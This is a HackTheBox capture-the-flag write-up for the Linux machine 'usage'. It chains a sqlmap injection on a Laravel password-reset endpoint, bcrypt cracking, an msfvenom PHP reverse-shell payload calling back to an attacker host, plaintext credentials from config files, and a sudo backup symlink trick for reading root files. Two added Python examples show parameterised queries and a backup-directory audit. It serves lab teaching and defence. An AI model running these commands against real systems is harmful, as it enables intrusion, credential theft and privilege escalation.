HTB: usage Writeup


Machine Information

Attribute | Details
Name | usage
OS | Linux
Difficulty | Easy
Points | N/A
Release Date | N/A
IP Address | 10.129.23.187
Author | D3vnomi

Machine Rating

⭐⭐⭐☆☆ (6.0/10)

Difficulty Assessment:

  • Enumeration: ⭐⭐☆☆☆
  • Real-world: ⭐⭐⭐☆☆
  • CVE: ⭐⭐☆☆☆
  • CTF-like: ⭐⭐☆☆☆

Summary

usage is an Easy-difficulty Linux machine running Ubuntu Linux with nginx and Laravel 10.10. The exploitation path involves subdomain enumeration to discover the admin panel, SQL injection on the password reset endpoint to extract credentials, credential cracking, admin panel access, reverse shell deployment, lateral movement through credential discovery, and privilege escalation via a symbolic link trick.

TL;DR: Subdomain enumeration → SQL injection → Credential cracking → Admin access → Reverse shell → Lateral movement → Privilege escalation → Root.


Reconnaissance

Port Scanning

nmap -sC -sV -T4 -p- 10.129.23.187

Results:

22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.6 (Ubuntu Linux; protocol 2.0)
80/tcp open http nginx 1.18.0 (Ubuntu)

Service Enumeration

Hostname: usage.htb

echo "10.129.23.187 usage.htb" >> /etc/hosts

Technology Stack:

PHP 8.1.2, Laravel 10.10, encore/laravel-admin 1.8.18, MySQL, nginx 1.18.0

Subdomain Discovery

Using ffuf and whatweb to enumerate subdomains:

ffuf -w /path/to/wordlist -u http://usage.htb -H "Host: FUZZ.usage.htb" -mc 200,301,302
whatweb http://admin.usage.htb

Discovered: admin.usage.htb — Laravel admin panel (encore/laravel-admin 1.8.18)

Vulnerability Assessment

Identified Vulnerabilities:

  • SQL Injection — The password reset endpoint (/forget-pass) contains SQL injection on the email parameter.
  • Weak Password Hashing — Bcrypt hash crackable via hashcat.
  • Misconfigured Sudo Permissions — Allows symbolic link exploitation.

Initial Foothold

SQL Injection on Password Reset

The password reset endpoint is vulnerable to SQL injection on the email parameter.

sqlmap -u "http://usage.htb/forget-pass" --data="email=*" -p email --dbs

Findings:

  • Databases: information_schema, performance_schema, usage_blog
  • Table: admin_users

Dump admin credentials:

sqlmap -u "http://usage.htb/forget-pass" --data="email=*" -p email -D usage_blog -T admin_users --dump

Result: admin user with bcrypt hash:

$2y$10$ohq2kLpBH/ri.P5wR0P3UOmc24Ydvl9DA9H1S6ooOMgH5xVfUPrL2
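
On the fix side, the difference between a concatenated and a bound lookup on the email field, as an added example (not code from the target application or the original write-up). The table layout, function names and sample inputs are constructed; sqlite3 stands in for MySQL.

```python
import sqlite3

GENERIC_REPLY = "If that address is registered, a reset link has been sent."

# Constructed inputs: a registered address, an unknown one, and an
# unknown one carrying a quote plus a tautology.
SAMPLES = ["alice@example.test", "nobody@example.test",
           "nobody@example.test' OR '1'='1"]

def make_db():
    """In-memory stand-in for the application's user table (constructed data)."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, email TEXT UNIQUE)")
    db.execute("INSERT INTO users (email) VALUES ('alice@example.test')")
    return db

def lookup_concatenated(db, email):
    """Weak form: the value is pasted into the SQL text, so a quote
    character in `email` is parsed as SQL rather than compared as data."""
    sql = "SELECT COUNT(*) FROM users WHERE email = '" + email + "'"
    return db.execute(sql).fetchone()[0] > 0

def lookup_bound(db, email):
    """Corrected form: the statement text is fixed and the value travels
    as a bound parameter, so it is only ever compared as a string."""
    sql = "SELECT COUNT(*) FROM users WHERE email = ?"
    return db.execute(sql, (email,)).fetchone()[0] > 0

def forget_pass(db, email, lookup=lookup_bound):
    """Hypothetical handler: the reply is the same whether or not the
    address exists, so it cannot serve as a yes/no oracle on the query."""
    if lookup(db, email):
        pass  # a real handler would queue the reset e-mail here
    return GENERIC_REPLY

def compare(email):
    """Return (concatenated_result, bound_result) for one input."""
    db = make_db()
    return lookup_concatenated(db, email), lookup_bound(db, email)

if __name__ == "__main__":
    for sample in SAMPLES:
        print(repr(sample), compare(sample))
```

In Laravel the same effect comes from passing the value through the query builder or Eloquent `where()` rather than building the SQL string by hand.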

Hash Cracking

Using hashcat to crack the bcrypt hash:

hashcat -m 3200 hash.txt /path/to/wordlist

Cracked: admin:whatever1

Admin Panel Access

Log in to the Laravel admin panel at http://admin.usage.htb/admin/auth/login:

Username: admin
Password: whatever1

Reverse Shell Deployment

Generate a PHP meterpreter payload:

msfvenom -p php/meterpreter/reverse_tcp LHOST=10.10.14.x LPORT=4444 > shell.php

Deploy the payload through the admin panel. This lands as user dash.


User Compromise

SSH Key Discovery

From the initial reverse shell as user dash, locate SSH keys:

cat /home/dash/.ssh/id_rsa

Alternatively, use the SSH key directly for remote access.

Credential Discovery

Examine the .monitrc configuration file in the home directory:

cat ~/.monitrc

Contents:

set httpd port 2812, allow admin:3nc0d3d_pa$$w0rd

Additional credentials found in .env:

staff:s3cr3t_c0d3d_1uth

User Flag

cat ~/user.txt

🚩 User Flag: <REDACTED>


Lateral Movement

SSH as xander

Using the credentials found in .monitrc:

ssh xander@usage.htb
# Password: 3nc0d3d_pa$$w0rd

Privilege Escalation

Enumeration

Check sudo permissions:

sudo -l

Result:

xander can run /usr/bin/usage_management without password

Exploitation (Root/Administrator)

The usage_management tool performs a backup operation when option 1 is selected. Exploit this via a symbolic link trick:

cd /home/xander
touch @root.txt
ln -sf /root/root.txt root.txt

Then execute the management tool:

sudo /usr/bin/usage_management

Select option 1 (backup) at the terminal prompt. This will copy the root flag to the current directory due to the symbolic link.
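
A pre-flight check for the backup case above, as an added example (not code from usage_management or the original write-up): before a sudo-run tool archives a user-writable directory, it can refuse symlinks that resolve outside that directory and file names an archiver would parse as arguments. The function names and the sample layout are assumptions made for illustration.

```python
import os
import tempfile

def audit_backup_dir(root):
    """List entries a privileged backup should refuse before archiving `root`.

    Flags names an archiver could read as arguments when a shell wildcard
    expands them ('@name' is a list file to 7-Zip, '-name' an option), and
    symlinks whose resolved target lies outside `root`.
    """
    root_real = os.path.realpath(root)
    findings = []
    for dirpath, dirnames, filenames in os.walk(root):  # does not follow links
        for name in sorted(dirnames + filenames):
            path = os.path.join(dirpath, name)
            rel = os.path.relpath(path, root)
            if name.startswith("@"):
                findings.append((rel, "list-file name", ""))
            elif name.startswith("-"):
                findings.append((rel, "option-like name", ""))
            if os.path.islink(path):
                target = os.path.realpath(path)
                if os.path.commonpath([root_real, target]) != root_real:
                    findings.append((rel, "symlink escapes tree", target))
    return findings

def demo():
    """Constructed layout modelled on the two files created in the write-up."""
    with tempfile.TemporaryDirectory() as base:
        secret = os.path.join(base, "secret.txt")  # stand-in for a root-only file
        work = os.path.join(base, "work")
        os.mkdir(work)
        for p in (secret, os.path.join(work, "@root.txt"),
                  os.path.join(work, "notes.txt")):
            open(p, "w").close()
        os.symlink(secret, os.path.join(work, "root.txt"))
        return [(rel, kind) for rel, kind, _ in audit_backup_dir(work)]

if __name__ == "__main__":
    for rel, kind in demo():
        print(f"{kind}: {rel}")
```

A tool that must archive untrusted directories should also pass paths explicitly (for example `./name`) instead of letting a wildcard expand them, and should not dereference symlinks while running as root.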

Root Flag

cat root.txt

🚩 Root Flag: <REDACTED>


Attack Chain Summary

graph TD
A[Reconnaissance: nmap, ffuf, whatweb] --> B[SQL Injection: forget-pass endpoint]
B --> C[Credential Cracking: hashcat]
C --> D[Admin Panel Access: encore/laravel-admin]
D --> E[Reverse Shell: msfvenom payload]
E --> F[User Access: dash shell]
F --> G[Credential Discovery: .monitrc config]
G --> H[Lateral Movement: SSH as xander]
H --> I[Privilege Escalation: symlink trick]
I --> J[Root Access: read root.txt]

Tools Used

Tool | Purpose
nmap | Port scanning and service fingerprinting
ffuf | Web fuzzing and subdomain enumeration
whatweb | Web technology identification
sqlmap | SQL injection exploitation on password reset endpoint
hashcat | Bcrypt password hash cracking
msfvenom | PHP meterpreter payload generation
ssh | Secure shell access to xander account
Burp Suite | Web application analysis and request manipulation
mysql | Database enumeration via SSH tunnel

Vulnerability Reference

# | Vulnerability | Component | Severity | Impact
1 | SQL Injection | Password Reset Endpoint | High | Credential extraction from admin_users table
2 | Weak Sudo Permissions | usage_management Binary | High | Privilege escalation via symlink exploitation
3 | Plaintext Configuration | .monitrc File | High | Credential disclosure for lateral movement
4 | Crackable Bcrypt Hash | Admin Credentials | Medium | Account takeover via hashcat

Key Learnings

  • Subdomain enumeration is critical — admin panels may not be on primary domains. Use ffuf and similar tools.
  • SQL injection in password reset endpoints is a high-impact vulnerability that can expose user credentials.
  • Configuration files like .monitrc and .env often contain plaintext credentials for lateral movement.
  • Symbolic link exploits can bypass file permission protections when combined with sudo commands that don’t properly validate file paths.
  • Credential reuse across multiple accounts and services is a common weakness; extracted credentials should be tested across all discovered services.
  • Hash cracking with tools like hashcat can be feasible for bcrypt hashes when the wordlist is comprehensive.

Author

D3vnomi


Disclaimer

This writeup is for educational purposes only. All activities described were performed in a controlled, legal environment (HackTheBox platform). Unauthorized access to computer systems is illegal.


Last Updated: 08 Mar 2026

Tags: #HackTheBox #Linux #Easy #SQLInjection #LaravelAdmin #SymlinkExploit #PrivilegeEscalation